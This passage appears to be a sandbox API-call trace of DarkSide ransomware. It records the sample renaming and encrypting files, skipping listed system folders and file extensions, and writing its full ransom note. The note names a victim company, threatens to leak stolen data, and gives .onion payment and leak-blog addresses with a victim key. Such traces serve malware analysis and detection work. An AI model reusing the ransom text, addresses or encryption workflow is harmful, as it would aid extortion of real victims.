dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.581] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.581] ReadFile (in: hFile=0x1a8, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.582] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x85ecb78d [0155.582] RtlComputeCrc32 (PartialCrc=0xb78d, Buffer=0x3fe8f4, Length=0x80) returned 0x944b9c37 [0155.582] RtlComputeCrc32 (PartialCrc=0x9c37, Buffer=0x3fe8f4, Length=0x80) returned 0x70feb21a [0155.582] RtlComputeCrc32 (PartialCrc=0xb21a, Buffer=0x3fe8f4, Length=0x80) returned 0xfe1aeb1e [0155.582] RtlComputeCrc32 (PartialCrc=0xeb1e, Buffer=0x3fe8f4, Length=0x80) returned 0xf2569a4b [0155.582] CloseHandle (hObject=0x1a8) returned 1 [0155.582] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.582] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp" [0155.582] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp") returned 0x44 [0155.582] wcscpy (in: _Dest=0x4510120, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.583] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\8_zfefw0offdn4m.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\8_zfefw0offdn4m.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\8_zfefw0offdn4m.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0155.602] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.602] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12840d9 [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33ba7046 [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x265a6f0f [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ec0a653 [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b2b7081 [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28b017d [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb9ff86 [0155.607] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f12da6b [0155.611] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0x39806c90 [0155.611] RtlComputeCrc32 (PartialCrc=0x6c90, Buffer=0x2880094, Length=0x80) returned 0x184d2756 [0155.611] RtlComputeCrc32 (PartialCrc=0x2756, Buffer=0x2880094, Length=0x80) returned 0x3a85f01f [0155.611] RtlComputeCrc32 (PartialCrc=0xf01f, Buffer=0x2880094, Length=0x80) returned 0x4457a2a [0155.611] RtlComputeCrc32 (PartialCrc=0x7a2a, Buffer=0x2880094, Length=0x80) returned 0xf71b0891 [0155.611] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0155.611] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.611] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.611] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31757f10, ftCreationTime.dwHighDateTime=0x1d5ddc4, ftLastAccessTime.dwLowDateTime=0x1563de00, ftLastAccessTime.dwHighDateTime=0x1d5e4ce, ftLastWriteTime.dwLowDateTime=0x1563de00, ftLastWriteTime.dwHighDateTime=0x1d5e4ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AX6_mnDSy", cAlternateFileName="AX6_MN~1")) returned 1 [0155.611] _wcsicmp (_Str1="$recycle.bin", _Str2="AX6_mnDSy") returned -61 [0155.611] wcslen (_String="$recycle.bin") returned 0xc [0155.611] _wcsicmp (_Str1="config.msi", _Str2="AX6_mnDSy") returned 2 [0155.611] wcslen (_String="config.msi") returned 0xa [0155.611] _wcsicmp (_Str1="$windows.~bt", _Str2="AX6_mnDSy") returned -61 [0155.611] wcslen (_String="$windows.~bt") returned 0xc [0155.611] _wcsicmp (_Str1="$windows.~ws", _Str2="AX6_mnDSy") returned -61 [0155.611] wcslen (_String="$windows.~ws") returned 0xc [0155.611] _wcsicmp (_Str1="windows", _Str2="AX6_mnDSy") returned 22 [0155.611] wcslen (_String="windows") returned 0x7 [0155.611] _wcsicmp (_Str1="appdata", _Str2="AX6_mnDSy") returned -8 [0155.611] wcslen (_String="appdata") returned 0x7 [0155.611] _wcsicmp (_Str1="application data", _Str2="AX6_mnDSy") returned -8 [0155.611] wcslen (_String="application data") returned 0x10 [0155.611] _wcsicmp (_Str1="boot", _Str2="AX6_mnDSy") returned 1 [0155.611] wcslen (_String="boot") returned 0x4 [0155.611] _wcsicmp (_Str1="google", _Str2="AX6_mnDSy") returned 6 [0155.611] wcslen (_String="google") returned 0x6 [0155.611] _wcsicmp (_Str1="mozilla", _Str2="AX6_mnDSy") returned 12 [0155.611] wcslen (_String="mozilla") returned 0x7 [0155.611] _wcsicmp (_Str1="program files", _Str2="AX6_mnDSy") returned 15 [0155.611] wcslen (_String="program files") returned 0xd [0155.611] _wcsicmp (_Str1="program files (x86)", _Str2="AX6_mnDSy") returned 15 [0155.612] wcslen (_String="program files (x86)") returned 0x13 [0155.612] _wcsicmp (_Str1="programdata", _Str2="AX6_mnDSy") returned 15 [0155.612] wcslen (_String="programdata") returned 0xb [0155.612] _wcsicmp (_Str1="system volume information", _Str2="AX6_mnDSy") returned 18 [0155.612] wcslen (_String="system volume information") returned 0x19 [0155.612] _wcsicmp (_Str1="tor browser", _Str2="AX6_mnDSy") returned 19 [0155.612] wcslen (_String="tor browser") returned 0xb [0155.612] _wcsicmp (_Str1="windows.old", _Str2="AX6_mnDSy") returned 22 [0155.612] wcslen (_String="windows.old") returned 0xb [0155.612] _wcsicmp (_Str1="intel", _Str2="AX6_mnDSy") returned 8 [0155.612] wcslen (_String="intel") returned 0x5 [0155.612] _wcsicmp (_Str1="msocache", _Str2="AX6_mnDSy") returned 12 [0155.612] wcslen (_String="msocache") returned 0x8 [0155.612] _wcsicmp (_Str1="perflogs", _Str2="AX6_mnDSy") returned 15 [0155.612] wcslen (_String="perflogs") returned 0x8 [0155.612] _wcsicmp (_Str1="x64dbg", _Str2="AX6_mnDSy") returned 23 [0155.612] wcslen (_String="x64dbg") returned 0x6 [0155.612] _wcsicmp (_Str1="public", _Str2="AX6_mnDSy") returned 15 [0155.612] wcslen (_String="public") returned 0x6 [0155.612] _wcsicmp (_Str1="all users", _Str2="AX6_mnDSy") returned -12 [0155.612] wcslen (_String="all users") returned 0x9 [0155.612] _wcsicmp (_Str1="default", _Str2="AX6_mnDSy") returned 3 [0155.612] wcslen (_String="default") returned 0x7 [0155.612] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*" [0155.612] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*") returned 0x32 [0155.612] wcscpy (in: _Dest=0x44e00e2, _Source="AX6_mnDSy" | out: _Dest="AX6_mnDSy") returned="AX6_mnDSy" [0155.612] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.612] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.613] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" [0155.613] GetNamedSecurityInfoW () returned 0x0 [0155.614] SetEntriesInAclW () returned 0x0 [0155.614] SetNamedSecurityInfoW () returned 0x0 [0155.617] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58378) returned 1 [0155.617] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.617] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy")) returned 1 [0155.617] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0155.617] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0155.617] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0155.618] CloseHandle (hObject=0x678) returned 1 [0155.619] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy")) returned 0x10 [0155.619] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\") returned="" [0155.619] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\") returned 0x3b [0155.619] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0155.619] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31757f10, ftCreationTime.dwHighDateTime=0x1d5ddc4, ftLastAccessTime.dwLowDateTime=0xdb5eba80, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb5eba80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.620] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb5eba80, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdb5eba80, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb5eba80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0155.620] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0155.620] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bfb330, ftCreationTime.dwHighDateTime=0x1d5e7f1, ftLastAccessTime.dwLowDateTime=0x4ef71c10, ftLastAccessTime.dwHighDateTime=0x1d5e148, ftLastWriteTime.dwLowDateTime=0x4ef71c10, ftLastWriteTime.dwHighDateTime=0x1d5e148, nFileSizeHigh=0x0, nFileSizeLow=0x94bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSbMERxin-_GjeJ1DC.jpg", cAlternateFileName="RSBMER~1.JPG")) returned 1 [0155.620] _wcsicmp (_Str1="RSbMERxin-_GjeJ1DC.jpg", _Str2="README.c06622a1.TXT") returned 14 [0155.620] wcsstr (_Str="RSbMERxin-_GjeJ1DC.jpg", _SubStr="README") returned 0x0 [0155.620] _wcsicmp (_Str1="autorun.inf", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -17 [0155.620] wcslen (_String="autorun.inf") returned 0xb [0155.620] _wcsicmp (_Str1="boot.ini", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -16 [0155.620] wcslen (_String="boot.ini") returned 0x8 [0155.620] _wcsicmp (_Str1="bootfont.bin", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -16 [0155.620] wcslen (_String="bootfont.bin") returned 0xc [0155.620] _wcsicmp (_Str1="bootsect.bak", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -16 [0155.620] wcslen (_String="bootsect.bak") returned 0xc [0155.620] _wcsicmp (_Str1="desktop.ini", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -14 [0155.620] wcslen (_String="desktop.ini") returned 0xb [0155.620] _wcsicmp (_Str1="iconcache.db", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -9 [0155.620] wcslen (_String="iconcache.db") returned 0xc [0155.620] _wcsicmp (_Str1="ntldr", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -4 [0155.620] wcslen (_String="ntldr") returned 0x5 [0155.620] _wcsicmp (_Str1="ntuser.dat", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -4 [0155.620] wcslen (_String="ntuser.dat") returned 0xa [0155.620] _wcsicmp (_Str1="ntuser.dat.log", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -4 [0155.620] wcslen (_String="ntuser.dat.log") returned 0xe [0155.621] _wcsicmp (_Str1="ntuser.ini", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned -4 [0155.621] wcslen (_String="ntuser.ini") returned 0xa [0155.621] _wcsicmp (_Str1="thumbs.db", _Str2="RSbMERxin-_GjeJ1DC.jpg") returned 2 [0155.621] wcslen (_String="thumbs.db") returned 0x9 [0155.621] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.621] wcslen (_String="386") returned 0x3 [0155.621] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.621] wcslen (_String="adv") returned 0x3 [0155.621] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.621] wcslen (_String="ani") returned 0x3 [0155.621] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.621] wcslen (_String="bat") returned 0x3 [0155.621] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.621] wcslen (_String="bin") returned 0x3 [0155.621] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.621] wcslen (_String="cab") returned 0x3 [0155.621] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.621] wcslen (_String="cmd") returned 0x3 [0155.621] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.621] wcslen (_String="com") returned 0x3 [0155.621] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.621] wcslen (_String="cpl") returned 0x3 [0155.621] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.621] wcslen (_String="cur") returned 0x3 [0155.621] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.621] wcslen (_String="deskthemepack") returned 0xd [0155.621] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.621] wcslen (_String="diagcab") returned 0x7 [0155.621] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.621] wcslen (_String="diagcfg") returned 0x7 [0155.621] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.621] wcslen (_String="diagpkg") returned 0x7 [0155.621] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.621] wcslen (_String="dll") returned 0x3 [0155.621] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.621] wcslen (_String="drv") returned 0x3 [0155.621] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.621] wcslen (_String="exe") returned 0x3 [0155.622] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.622] wcslen (_String="hlp") returned 0x3 [0155.622] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.622] wcslen (_String="icl") returned 0x3 [0155.622] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.622] wcslen (_String="icns") returned 0x4 [0155.622] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.622] wcslen (_String="ico") returned 0x3 [0155.622] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.622] wcslen (_String="ics") returned 0x3 [0155.622] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.622] wcslen (_String="idx") returned 0x3 [0155.622] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.622] wcslen (_String="ldf") returned 0x3 [0155.622] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.622] wcslen (_String="lnk") returned 0x3 [0155.622] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.622] wcslen (_String="mod") returned 0x3 [0155.622] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.622] wcslen (_String="mpa") returned 0x3 [0155.622] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.622] wcslen (_String="msc") returned 0x3 [0155.622] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.622] wcslen (_String="msp") returned 0x3 [0155.622] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.622] wcslen (_String="msstyles") returned 0x8 [0155.622] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.622] wcslen (_String="msu") returned 0x3 [0155.622] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.622] wcslen (_String="nls") returned 0x3 [0155.622] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.622] wcslen (_String="nomedia") returned 0x7 [0155.622] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0155.622] wcslen (_String="ocx") returned 0x3 [0155.622] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.622] wcslen (_String="prf") returned 0x3 [0155.622] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.623] wcslen (_String="ps1") returned 0x3 [0155.623] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.623] wcslen (_String="rom") returned 0x3 [0155.623] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.623] wcslen (_String="rtp") returned 0x3 [0155.623] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.623] wcslen (_String="scr") returned 0x3 [0155.623] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.623] wcslen (_String="shs") returned 0x3 [0155.623] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.623] wcslen (_String="spl") returned 0x3 [0155.623] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.623] wcslen (_String="sys") returned 0x3 [0155.623] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.623] wcslen (_String="theme") returned 0x5 [0155.623] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.623] wcslen (_String="themepack") returned 0x9 [0155.623] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.623] wcslen (_String="wpx") returned 0x3 [0155.623] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.623] wcslen (_String="lock") returned 0x4 [0155.623] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.623] wcslen (_String="key") returned 0x3 [0155.623] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.623] wcslen (_String="hta") returned 0x3 [0155.623] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.623] wcslen (_String="msi") returned 0x3 [0155.623] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.623] wcslen (_String="pdb") returned 0x3 [0155.623] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0155.623] wcslen (_String="sql") returned 0x3 [0155.623] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.623] wcslen (_String="sqlite") returned 0x6 [0155.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy")) returned 0x10 [0155.623] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.623] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" [0155.624] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned 0x3a [0155.624] wcscpy (in: _Dest=0x453011e, _Source="RSbMERxin-_GjeJ1DC.jpg" | out: _Dest="RSbMERxin-_GjeJ1DC.jpg") returned="RSbMERxin-_GjeJ1DC.jpg" [0155.624] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg", dwFileAttributes=0x80) returned 1 [0155.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\rsbmerxin-_gjej1dc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0155.624] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.624] ReadFile (in: hFile=0x65c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.625] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x378d8ce9 [0155.625] RtlComputeCrc32 (PartialCrc=0x8ce9, Buffer=0x3fe674, Length=0x80) returned 0x2020e506 [0155.625] RtlComputeCrc32 (PartialCrc=0xe506, Buffer=0x3fe674, Length=0x80) returned 0xa6a7c599 [0155.625] RtlComputeCrc32 (PartialCrc=0xc599, Buffer=0x3fe674, Length=0x80) returned 0x85fb4238 [0155.625] RtlComputeCrc32 (PartialCrc=0x4238, Buffer=0x3fe674, Length=0x80) returned 0xb8d4140 [0155.625] CloseHandle (hObject=0x65c) returned 1 [0155.625] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.626] wcscpy 